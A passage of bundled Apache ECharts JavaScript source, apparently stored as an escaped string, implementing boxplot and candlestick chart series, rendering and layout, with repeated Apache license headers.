'updateProps'];\n\n    updateMethod(\n        el,\n        {shape: {points: itemLayout.ends}},\n        seriesModel,\n        dataIndex\n    );\n\n    var itemModel = data.getItemModel(dataIndex);\n    var normalItemStyleModel = itemModel.getModel(NORMAL_ITEM_STYLE_PATH);\n    var borderColor = data.getItemVisual(dataIndex, 'color');\n\n    // Exclude borderColor.\n    var itemStyle = normalItemStyleModel.getItemStyle(['borderColor']);\n    itemStyle.stroke = borderColor;\n    itemStyle.strokeNoScale = true;\n    el.useStyle(itemStyle);\n\n    el.z2 = 100;\n\n    var hoverStyle = itemModel.getModel(EMPHASIS_ITEM_STYLE_PATH).getItemStyle();\n    setHoverStyle(el, hoverStyle);\n}\n\nfunction transInit(points, dim, itemLayout) {\n    return map(points, function (point) {\n        point = point.slice();\n        point[dim] = itemLayout.initBaseline;\n        return point;\n    });\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nvar borderColorQuery = ['itemStyle', 'borderColor'];\n\nvar boxplotVisual = function (ecModel, api) {\n\n    var globalColors = ecModel.get('color');\n\n    ecModel.eachRawSeriesByType('boxplot', function (seriesModel) {\n\n        var defaulColor = globalColors[seriesModel.seriesIndex % globalColors.length];\n        var data = seriesModel.getData();\n\n        data.setVisual({\n            legendSymbol: 'roundRect',\n            // Use name 'color' but not 'borderColor' for legend usage and\n            // visual coding from other component like dataRange.\n            color: seriesModel.get(borderColorQuery) || defaulColor\n        });\n\n        // Only visible series has each data be visual encoded\n        if (!ecModel.isSeriesFiltered(seriesModel)) {\n            data.each(function (idx) {\n                var itemModel = data.getItemModel(idx);\n                data.setItemVisual(\n                    idx,\n                    {color: itemModel.get(borderColorQuery, true)}\n                );\n            });\n        }\n    });\n\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar each$13 = each$1;\n\nvar boxplotLayout = function (ecModel) {\n\n    var groupResult = groupSeriesByAxis(ecModel);\n\n    each$13(groupResult, function (groupItem) {\n        var seriesModels = groupItem.seriesModels;\n\n        if (!seriesModels.length) {\n            return;\n        }\n\n        calculateBase(groupItem);\n\n        each$13(seriesModels, function (seriesModel, idx) {\n            layoutSingleSeries(\n                seriesModel,\n                groupItem.boxOffsetList[idx],\n                groupItem.boxWidthList[idx]\n            );\n        });\n    });\n};\n\n/**\n * Group series by axis.\n */\nfunction groupSeriesByAxis(ecModel) {\n    var result = [];\n    var axisList = [];\n\n    ecModel.eachSeriesByType('boxplot', function (seriesModel) {\n        var baseAxis = seriesModel.getBaseAxis();\n        var idx = indexOf(axisList, baseAxis);\n\n        if (idx < 0) {\n            idx = axisList.length;\n            axisList[idx] = baseAxis;\n            result[idx] = {axis: baseAxis, seriesModels: []};\n        }\n\n        result[idx].seriesModels.push(seriesModel);\n    });\n\n    return result;\n}\n\n/**\n * Calculate offset and box width for each series.\n */\nfunction calculateBase(groupItem) {\n    var extent;\n    var baseAxis = groupItem.axis;\n    var seriesModels = groupItem.seriesModels;\n    var seriesCount = seriesModels.length;\n\n    var boxWidthList = groupItem.boxWidthList = [];\n    var boxOffsetList = groupItem.boxOffsetList = [];\n    var boundList = [];\n\n    var bandWidth;\n    if (baseAxis.type === 'category') {\n        bandWidth = baseAxis.getBandWidth();\n    }\n    else {\n        var maxDataCount = 0;\n        each$13(seriesModels, function (seriesModel) {\n            maxDataCount = Math.max(maxDataCount, seriesModel.getData().count());\n        });\n        extent = baseAxis.getExtent(),\n        Math.abs(extent[1] - extent[0]) / maxDataCount;\n    }\n\n    each$13(seriesModels, function (seriesModel) {\n        var boxWidthBound = seriesModel.get('boxWidth');\n        if (!isArray(boxWidthBound)) {\n            boxWidthBound = [boxWidthBound, boxWidthBound];\n        }\n        boundList.push([\n            parsePercent$1(boxWidthBound[0], bandWidth) || 0,\n            parsePercent$1(boxWidthBound[1], bandWidth) || 0\n        ]);\n    });\n\n    var availableWidth = bandWidth * 0.8 - 2;\n    var boxGap = availableWidth / seriesCount * 0.3;\n    var boxWidth = (availableWidth - boxGap * (seriesCount - 1)) / seriesCount;\n    var base = boxWidth / 2 - availableWidth / 2;\n\n    each$13(seriesModels, function (seriesModel, idx) {\n        boxOffsetList.push(base);\n        base += boxGap + boxWidth;\n\n        boxWidthList.push(\n            Math.min(Math.max(boxWidth, boundList[idx][0]), boundList[idx][1])\n        );\n    });\n}\n\n/**\n * Calculate points location for each series.\n */\nfunction layoutSingleSeries(seriesModel, offset, boxWidth) {\n    var coordSys = seriesModel.coordinateSystem;\n    var data = seriesModel.getData();\n    var halfWidth = boxWidth / 2;\n    var cDimIdx = seriesModel.get('layout') === 'horizontal' ? 0 : 1;\n    var vDimIdx = 1 - cDimIdx;\n    var coordDims = ['x', 'y'];\n    var cDim = data.mapDimension(coordDims[cDimIdx]);\n    var vDims = data.mapDimension(coordDims[vDimIdx], true);\n\n    if (cDim == null || vDims.length < 5) {\n        return;\n    }\n\n    for (var dataIndex = 0; dataIndex < data.count(); dataIndex++) {\n        var axisDimVal = data.get(cDim, dataIndex);\n\n        var median = getPoint(axisDimVal, vDims[2], dataIndex);\n        var end1 = getPoint(axisDimVal, vDims[0], dataIndex);\n        var end2 = getPoint(axisDimVal, vDims[1], dataIndex);\n        var end4 = getPoint(axisDimVal, vDims[3], dataIndex);\n        var end5 = getPoint(axisDimVal, vDims[4], dataIndex);\n\n        var ends = [];\n        addBodyEnd(ends, end2, 0);\n        addBodyEnd(ends, end4, 1);\n\n        ends.push(end1, end2, end5, end4);\n        layEndLine(ends, end1);\n        layEndLine(ends, end5);\n        layEndLine(ends, median);\n\n        data.setItemLayout(dataIndex, {\n            initBaseline: median[vDimIdx],\n            ends: ends\n        });\n    }\n\n    function getPoint(axisDimVal, dimIdx, dataIndex) {\n        var val = data.get(dimIdx, dataIndex);\n        var p = [];\n        p[cDimIdx] = axisDimVal;\n        p[vDimIdx] = val;\n        var point;\n        if (isNaN(axisDimVal) || isNaN(val)) {\n            point = [NaN, NaN];\n        }\n        else {\n            point = coordSys.dataToPoint(p);\n            point[cDimIdx] += offset;\n        }\n        return point;\n    }\n\n    function addBodyEnd(ends, point, start) {\n        var point1 = point.slice();\n        var point2 = point.slice();\n        point1[cDimIdx] += halfWidth;\n        point2[cDimIdx] -= halfWidth;\n        start\n            ? ends.push(point1, point2)\n            : ends.push(point2, point1);\n    }\n\n    function layEndLine(ends, endCenter) {\n        var from = endCenter.slice();\n        var to = endCenter.slice();\n        from[cDimIdx] -= halfWidth;\n        to[cDimIdx] += halfWidth;\n        ends.push(from, to);\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterVisual(boxplotVisual);\nregisterLayout(boxplotLayout);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar CandlestickSeries = SeriesModel.extend({\n\n    type: 'series.candlestick',\n\n    dependencies: ['xAxis', 'yAxis', 'grid'],\n\n    /**\n     * @readOnly\n     */\n    defaultValueDimensions: [\n        {name: 'open', defaultTooltip: true},\n        {name: 'close', defaultTooltip: true},\n        {name: 'lowest', defaultTooltip: true},\n        {name: 'highest', defaultTooltip: true}\n    ],\n\n    /**\n     * @type {Array.<string>}\n     * @readOnly\n     */\n    dimensions: null,\n\n    /**\n     * @override\n     */\n    defaultOption: {\n        zlevel: 0,\n        z: 2,\n        coordinateSystem: 'cartesian2d',\n        legendHoverLink: true,\n\n        hoverAnimation: true,\n\n        // xAxisIndex: 0,\n        // yAxisIndex: 0,\n\n        layout: null, // 'horizontal' or 'vertical'\n\n        clip: true,\n\n        itemStyle: {\n            color: '#c23531', // 阳线 positive\n            color0: '#314656', // 阴线 negative     '#c23531', '#314656'\n            borderWidth: 1,\n            // FIXME\n            // ec2中使用的是lineStyle.color 和 lineStyle.color0\n            borderColor: '#c23531',\n            borderColor0: '#314656'\n        },\n\n        emphasis: {\n            itemStyle: {\n                borderWidth: 2\n            }\n        },\n\n        barMaxWidth: null,\n        barMinWidth: null,\n        barWidth: null,\n\n        large: true,\n        largeThreshold: 600,\n\n        progressive: 3e3,\n        progressiveThreshold: 1e4,\n        progressiveChunkMode: 'mod',\n\n        animationUpdate: false,\n        animationEasing: 'linear',\n        animationDuration: 300\n    },\n\n    /**\n     * Get dimension for shadow in dataZoom\n     * @return {string} dimension name\n     */\n    getShadowDim: function () {\n        return 'open';\n    },\n\n    brushSelector: function (dataIndex, data, selectors) {\n        var itemLayout = data.getItemLayout(dataIndex);\n        return itemLayout && selectors.rect(itemLayout.brushRect);\n    }\n\n});\n\nmixin(CandlestickSeries, seriesModelMixin, true);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar NORMAL_ITEM_STYLE_PATH$1 = ['itemStyle'];\nvar EMPHASIS_ITEM_STYLE_PATH$1 = ['emphasis', 'itemStyle'];\nvar SKIP_PROPS = ['color', 'color0', 'borderColor', 'borderColor0'];\n\nvar CandlestickView = Chart.extend({\n\n    type: 'candlestick',\n\n    render: function (seriesModel, ecModel, api) {\n        // If there is clipPath created in large mode. Remove it.\n        this.group.removeClipPath();\n\n        this._updateDrawMode(seriesModel);\n\n        this._isLargeDraw\n            ? this._renderLarge(seriesModel)\n            : this._renderNormal(seriesModel);\n    },\n\n    incrementalPrepareRender: function (seriesModel, ecModel, api) {\n        this._clear();\n        this._updateDrawMode(seriesModel);\n    },\n\n    incrementalRender: function (params, seriesModel, ecModel, api) {\n        this._isLargeDraw\n             ? this._incrementalRenderLarge(params, seriesModel)\n             : this._incrementalRenderNormal(params, seriesModel);\n    },\n\n    _updateDrawMode: function (seriesModel) {\n        var isLargeDraw = seriesModel.pipelineContext.large;\n        if (this._isLargeDraw == null || isLargeDraw ^ this._isLargeDraw) {\n            this._isLargeDraw = isLargeDraw;\n            this._clear();\n        }\n    },\n\n    _renderNormal: function (seriesModel) {\n        var data = seriesModel.getData();\n        var oldData = this._data;\n        var group = this.group;\n        var isSimpleBox = data.getLayout('isSimpleBox');\n\n        var needsClip = seriesModel.get('clip', true);\n        var coord = seriesModel.coordinateSystem;\n        var clipArea = coord.getArea && coord.getArea();\n\n        // There is no old data only when first rendering or switching from\n        // stream mode to normal mode, where previous elements should be removed.\n        if (!this._data) {\n            group.removeAll();\n        }\n\n        data.diff(oldData)\n            .add(function (newIdx) {\n                if (data.hasValue(newIdx)) {\n                    var el;\n\n                    var itemLayout = data.getItemLayout(newIdx);\n\n                    if (needsClip && isNormalBoxClipped(clipArea, itemLayout)) {\n                        return;\n                    }\n\n                    el = createNormalBox$1(itemLayout, newIdx, true);\n                    initProps(el, {shape: {points: itemLayout.ends}}, seriesModel, newIdx);\n\n                    setBoxCommon(el, data, newIdx, isSimpleBox);\n\n                    group.add(el);\n\n                    data.setItemGraphicEl(newIdx, el);\n                }\n            })\n            .update(function (newIdx, oldIdx) {\n                var el = oldData.getItemGraphicEl(oldIdx);\n\n                // Empty data\n                if (!data.hasValue(newIdx)) {\n                    group.remove(el);\n                    return;\n                }\n\n                var itemLayout = data.getItemLayout(newIdx);\n                if (needsClip && isNormalBoxClipped(clipArea, itemLayout)) {\n                    group.remove(el);\n                    return;\n                }\n\n                if (!el) {\n                    el = createNormalBox$1(itemLayout, newIdx);\n                }\n                else {\n                    updateProps(el, {shape: {points: itemLayout.ends}}, seriesModel, newIdx);\n                }\n\n                setBoxCommon(el, data, newIdx, isSimpleBox);\n\n                group.add(el);\n                data.setItemGraphicEl(newIdx, el);\n            })\n            .remove(function (oldIdx) {\n                var el = oldData.getItemGraphicEl(oldIdx);\n                el && group.remove(el);\n            })\n            .execute();\n\n        this._data = data;\n    },\n\n    _renderLarge: function (seriesModel) {\n        this._clear();\n\n        createLarge$1(seriesModel, this.group);\n\n        var clipPath = seriesModel.get('clip', true)\n            ? createClipPath(seriesModel.coordinateSystem, false, seriesModel)\n            : null;\n        if (clipPath) {\n            this.group.setClipPath(clipPath);\n        }\n        else {\n            this.group.removeClipPath();\n        }\n\n    },\n\n    _incrementalRenderNormal: function (params, seriesModel) {\n        var data = seriesModel.getData();\n        var isSimpleBox = data.getLayout('isSimpleBox');\n\n        var dataIndex;\n        while ((dataIndex = params.next()) != null) {\n            var el;\n\n            var itemLayout = data.getItemLayout(dataIndex);\n            el = createNormalBox$1(itemLayout, dataIndex);\n            setBoxCommon(el, data, dataIndex, isSimpleBox);\n\n            el.incremental = true;\n            this.group.add(el);\n        }\n    },\n\n    _incrementalRenderLarge: function (params, seriesModel) {\n        createLarge$1(seriesModel, this.group, true);\n    },\n\n    remove: function (ecModel) {\n        this._clear();\n    },\n\n    _clear: function () {\n        this.group.removeAll();\n        this._data = null;\n    },\n\n    dispose: noop\n\n});\n\n\nvar NormalBoxPath = Path.extend({\n\n    type: 'normalCandlestickBox',\n\n    shape: {},\n\n    buildPath: function (ctx, shape) {\n        var ends = shape.points;\n\n        if (this.__simpleBox) {\n            ctx.moveTo(ends[4][0], ends[4][1]);\n            ctx.lineTo(ends[6][0], ends[6][1]);\n        }\n        else {\n            ctx.moveTo(ends[0][0], ends[0][1]);\n            ctx.lineTo(ends[1][0], ends[1][1]);\n            ctx.lineTo(ends[2][0], ends[2][1]);\n            ctx.lineTo(ends[3][0], ends[3][1]);\n            ctx.closePath();\n\n            ctx.moveTo(ends[4][0], ends[4][1]);\n            ctx.lineTo(ends[5][0], ends[5][1]);\n            ctx.moveTo(ends[6][0], ends[6][1]);\n            ctx.lineTo(ends[7][0], ends[7][1]);\n        }\n    }\n});\n\n\nfunction createNormalBox$1(itemLayout, dataIndex, isInit) {\n    var ends = itemLayout.ends;\n    return new NormalBoxPath({\n        shape: {\n            points: isInit\n                ? transInit$1(ends, itemLayout)\n                : ends\n        },\n        z2: 100\n    });\n}\n\nfunction isNormalBoxClipped(clipArea, itemLayout) {\n    var clipped = true;\n    for (var i = 0; i < itemLayout.ends.length; i++) {\n        // If any point are in the region.\n        if (clipArea.contain(itemLayout.ends[i][0], itemLayout.ends[i][1])) {\n            clipped = false;\n            break;\n        }\n    }\n    return clipped;\n}\n\nfunction setBoxCommon(el, data, dataIndex, isSimpleBox) {\n    var itemModel = data.getItemModel(dataIndex);\n    var normalItemStyleModel = itemModel.getModel(NORMAL_ITEM_STYLE_PATH$1);\n    var color = data.getItemVisual(dataIndex, 'color');\n    var borderColor = data.getItemVisual(dataIndex, 'borderColor') || color;\n\n    // Color must be excluded.\n    // Because symbol provide setColor individually to set fill and stroke\n    var itemStyle = normalItemStyleModel.getItemStyle(SKIP_PROPS);\n\n    el.useStyle(itemStyle);\n    el.style.strokeNoScale = true;\n    el.style.fill = color;\n    el.style.stroke = borderColor;\n\n    el.__simpleBox = isSimpleBox;\n\n    var hoverStyle = itemModel.getModel(EMPHASIS_ITEM_STYLE_PATH$1).getItemStyle();\n    setHoverStyle(el, hoverStyle);\n}\n\nfunction transInit$1(points, itemLayout) {\n    return map(points, function (point) {\n        point = point.slice();\n        point[1] = itemLayout.initBaseline;\n        return point;\n    });\n}\n\n\n\nvar LargeBoxPath = Path.extend({\n\n    type: 'largeCandlestickBox',\n\n    shape: {},\n\n    buildPath: function (ctx, shape) {\n        // Drawing lines is more efficient than drawing\n        // a whole line or drawing rects.\n        var points = shape.points;\n        for (var i = 0; i < points.length;) {\n            if (this.__sign === points[i++]) {\n                var x = points[i++];\n                ctx.moveTo(x, points[i++]);\n                ctx.lineTo(x, points[i++]);\n            }\n            else {\n                i += 3;\n            }\n        }\n    }\n});\n\nfunction createLarge$1(seriesModel, group, incremental) {\n    var data = seriesModel.getData();\n    var largePoints = data.getLayout('largePoints');\n\n    var elP = new LargeBoxPath({\n        shape: {points: largePoints},\n        __sign: 1\n    });\n    group.add(elP);\n    var elN = new LargeBoxPath({\n        shape: {points: largePoints},\n        __sign: -1\n    });\n    group.add(elN);\n\n    setLargeStyle$1(1, elP, seriesModel, data);\n    setLargeStyle$1(-1, elN, seriesModel, data);\n\n    if (incremental) {\n        elP.incremental = true;\n        elN.incremental = true;\n    }\n}\n\nfunction setLargeStyle$1(sign, el, seriesModel, data) {\n    var suffix = sign > 0 ? 'P' : 'N';\n    var borderColor = data.getVisual('borderColor' + suffix)\n        || data.getVisual('color' + suffix);\n\n    // Color must be excluded.\n    // Because symbol provide setColor individually to set fill and stroke\n    var itemStyle = seriesModel.getModel(NORMAL_ITEM_STYLE_PATH$1).getItemStyle(SKIP_PROPS);\n\n    el.useStyle(itemStyle);\n    el.style.fill = null;\n    el.style.stroke = borderColor;\n    // No different\n    // el.style.lineWidth = .5;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar preprocessor = function (option) {\n    if (!option || !isArray(option.series)) {\n        return;\n    }\n\n    // Translate 'k' to 'candlestick'.\n    each$1(option.series, function (seriesItem) {\n        if (isObject$1(seriesItem) && seriesItem.type === 'k') {\n            seriesItem.type = 'candlestick';\n        }\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar positiveBorderColorQuery = ['itemStyle', 'borderColor'];\nvar negativeBorderColorQuery = ['itemStyle', 'borderColor0'];\nvar positiveColorQuery = ['itemStyle', 'color'];\nvar negativeColorQuery = ['itemStyle', 'color0'];\n\nvar candlestickVisual = {\n\n    seriesType: 'candlestick',\n\n    plan: createRenderPlanner(),\n\n    // For legend.\n    performRawSeries: true,\n\n    reset: function (seriesModel, ecModel) {\n\n        var data = seriesModel.getData();\n\n        data.setVisual({\n            legendSymbol: 'roundRect',\n            colorP: getColor(1, seriesModel),\n            colorN: getColor(-1, seriesModel),\n            borderColorP: getBorderColor(1, seriesModel),\n            borderColorN: getBorderColor(-1, seriesModel)\n        });\n\n        // Only visible series has each data be visual encoded\n        if (ecModel.isSeriesFiltered(seriesModel)) {\n            return;\n        }\n\n        var isLargeRender = seriesModel.pipelineContext.large;\n        return !isLargeRender && {progress: progress};\n\n\n        function progress(params, data) {\n            var dataIndex;\n            while ((dataIndex = params.next()) != null) {\n                var itemModel = data.getItemModel(dataIndex);\n                var sign = data.getItemLayout(dataIndex).sign;\n\n                data.setItemVisual(\n                    dataIndex,\n                    {\n                        color: getColor(sign, itemModel),\n                        borderColor: getBorderColor(sign, itemModel)\n                    }\n                );\n            }\n        }\n\n        function getColor(sign, model) {\n            return model.get(\n                sign > 0 ? positiveColorQuery : negativeColorQuery\n            );\n        }\n\n        function getBorderColor(sign, model) {\n            return model.get(\n                sign > 0 ? positiveBorderColorQuery : negativeBorderColorQuery\n            );\n        }\n\n    }\n\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/* global Float32Array */\n\nvar LargeArr$1 = typeof Float32Array !== 'undefined' ? Float32Array : Array;\n\nvar candlestickLayout = {\n\n    seriesType: 'candlestick',\n\n    plan: createRenderPlanner(),\n\n    reset: function (seriesModel) {\n\n        var coordSys = seriesModel.coordinateSystem;\n        var data = seriesModel.getData();\n        var candleWidth = calculateCandleWidth(seriesModel, data);\n        var cDimIdx = 0;\n        var vDimIdx = 1;\n        var coordDims = ['x', 'y'];\n        var cDim = data.mapDimension(coordDims[cDimIdx]);\n        var vDims = data.mapDimension(coordDims[vDimIdx], true);\n        var openDim = vDims[0];\n        var closeDim = vDims[1];\n        var lowestDim = vDims[2];\n        var highestDim = vDims[3];\n\n        data.setLayout({\n            candleWidth: candleWidth,\n            // The value is experimented visually.\n            isSimpleBox: candleWidth <= 1.3\n        });\n\n        if (cDim == null || vDims.length < 4) {\n            return;\n        }\n\n        return {\n            progress: seriesModel.pipelineContext.large\n                ? largeProgress : normalProgress\n        };\n\n        function normalProgress(params, data) {\n            var dataIndex;\n            while ((dataIndex = params.next()) != null) {\n\n                var axisDimVal = data.get(cDim, dataIndex);\n                var openVal = data.get(openDim, dataIndex);\n                var closeVal = data.get(closeDim, dataIndex);\n                var lowestVal = data.get(lowestDim, dataIndex);\n                var highestVal = data.get(highestDim, dataIndex);\n\n                var ocLow = Math.min(openVal, closeVal);\n                var ocHigh = Math.max(openVal, closeVal);\n\n                var ocLowPoint = getPoint(ocLow, axisDimVal);\n                var ocHighPoint = getPoint(ocHigh, axisDimVal);\n                var lowestPoint = getPoint(lowestVal, axisDimVal);\n                var highestPoint = getPoint(highestVal, axisDimVal);\n\n                var ends = [];\n                addBodyEnd(ends, ocHighPoint, 0);\n                addBodyEnd(ends, ocLowPoint, 1);\n\n                ends.push(\n                    subPixelOptimizePoint(highestPoint),\n                    subPixelOptimizePoint(ocHighPoint),\n                    subPixelOptimizePoint(lowestPoint),\n                    subPixelOptimizePoint(ocLowPoint)\n                );\n\n                data.setItemLayout(dataIndex, {\n                    sign: getSign(data, dataIndex, openVal, closeVal, closeDim),\n                    initBaseline: openVal > closeVal\n                        ? ocHighPoint[vDimIdx] : ocLowPoint[vDimIdx], // open point.\n                    ends: ends,\n                    brushRect: makeBrushRect(lowestVal, highestVal, axisDimVal)\n                });\n            }\n\n            function getPoint(val, axisDimVal) {\n                var p = [];\n                p[cDimIdx] = axisDimVal;\n                p[vDimIdx] = val;\n                return (isNaN(axisDimVal) || isNaN(val))\n                    ? [NaN, NaN]\n                    : coordSys.dataToPoint(p);\n            }\n\n            function addBodyEnd(ends, point, start) {\n                var point1 = point.slice();\n                var point2 = point.slice();\n\n                point1[cDimIdx] = subPixelOptimize(\n                    point1[cDimIdx] + candleWidth / 2, 1, false\n                );\n                point2[cDimIdx] = subPixelOptimize(\n                    point2[cDimIdx] - candleWidth / 2, 1, true\n                );\n\n                start\n                    ? ends.push(point1, point2)\n                    : ends.push(point2, point1);\n            }\n\n            function makeBrushRect(lowestVal, highestVal, axisDimVal) {\n                var pmin = getPoint(lowestVal, axisDimVal);\n                var pmax = getPoint(highestVal, axisDimVal);\n\n                pmin[cDimIdx] -= candleWidth / 2;\n                pmax[cDimIdx] -= candleWidth / 2;\n\n                return {\n                    x: pmin[0],\n                    y: pmin[1],\n                    width: vDimIdx ? candleWidth : pmax[0] - pmin[0],\n                    height: vDimIdx ? pmax[1] - pmin[1] : candleWidth\n                };\n            }\n\n            function subPixelOptimizePoint(point) {\n                point[cDimIdx] = subPixelOptimize(point[cDimIdx], 1);\n                return point;\n            }\n        }\n\n        function largeProgress(params, data) {\n            // Structure: [sign, x, yhigh, ylow, sign, x, yhigh, ylow, ...]\n            var points = new LargeArr$1(params.count * 4);\n            var offset = 0;\n            var point;\n            var tmpIn = [];\n            var tmpOut = [];\n            var dataIndex;\n\n            while ((dataIndex = params.next()) != null) {\n                var axisDimVal = data.get(cDim, dataIndex);\n                var openVal = data.get(openDim, dataIndex);\n                var closeVal = data.get(closeDim, dataIndex);\n                var lowestVal = data.get(lowestDim, dataIndex);\n                var highestVal = data.get(highestDim, dataIndex);\n\n                if (isNaN(axisDimVal) || isNaN(lowestVal) || isNaN(highestVal)) {\n                    points[offset++] = NaN;\n                    offset += 3;\n                    continue;\n                }\n\n                points[offset++] = getSign(data, dataIndex, openVal, closeVal, closeDim);\n\n                tmpIn[cDimIdx] = axisDimVal;\n\n                tmpIn[vDimIdx] = lowestVal;\n                point = coordSys.dataToPoint(tmpIn, null, tmpOut);\n                points[offset++] = point ? point[0] : NaN;\n                points[offset++] = point ? point[1] : NaN;\n                tmpIn[vDimIdx] = highestVal;\n                point = coordSys.dataToPoint(tmpIn, null, tmpOut);\n                points[offset++] = point ? point[1] : NaN;\n            }\n\n            data.setLayout('largePoints', points);\n        }\n    }\n};\n\nfunction getSign(data, dataIndex, openVal, closeVal, closeDim) {\n    var sign;\n    if (openVal > closeVal) {\n        sign = -1;\n    }\n    else if (openVal < closeVal) {\n        sign = 1;\n    }\n    else {\n        sign = dataIndex > 0\n            // If close === open, compare with close of last record\n            ? (data.get(closeDim, dataIndex - 1) <= closeVal ? 1 : -1)\n            // No record of previous, set to be positive\n            : 1;\n    }\n\n    return sign;\n}\n\nfunction calculateCandleWidth(seriesModel, data) {\n    var baseAxis = seriesModel.getBaseAxis();\n    var extent;\n\n    var bandWidth = baseAxis.type === 'category'\n        ? baseAxis.getBandWidth()\n        : (\n            extent = baseAxis.getExtent(),\n            Math.abs(extent[1] - extent[0]) / data.count()\n        );\n\n    var barMaxWidth = parsePercent$1(\n        retrieve2(seriesModel.get('barMaxWidth'), bandWidth),\n        bandWidth\n    );\n    var barMinWidth = parsePercent$1(\n        retrieve2(seriesModel.get('barMinWidth'), 1),\n        bandWidth\n    );\n    var barWidth = seriesModel.get('barWidth');\n\n    return barWidth != null\n        ? parsePercent$1(barWidth, bandWidth)\n        // Put max outer to ensure bar visible in spite of overlap.\n        : Math.max(Math.min(bandWidth / 2, barMaxWidth), barMinWidth);\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterPreprocessor(preprocessor);\nregisterVisual(candlestickVisual);\nregisterLayout(candlestickLayout);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional 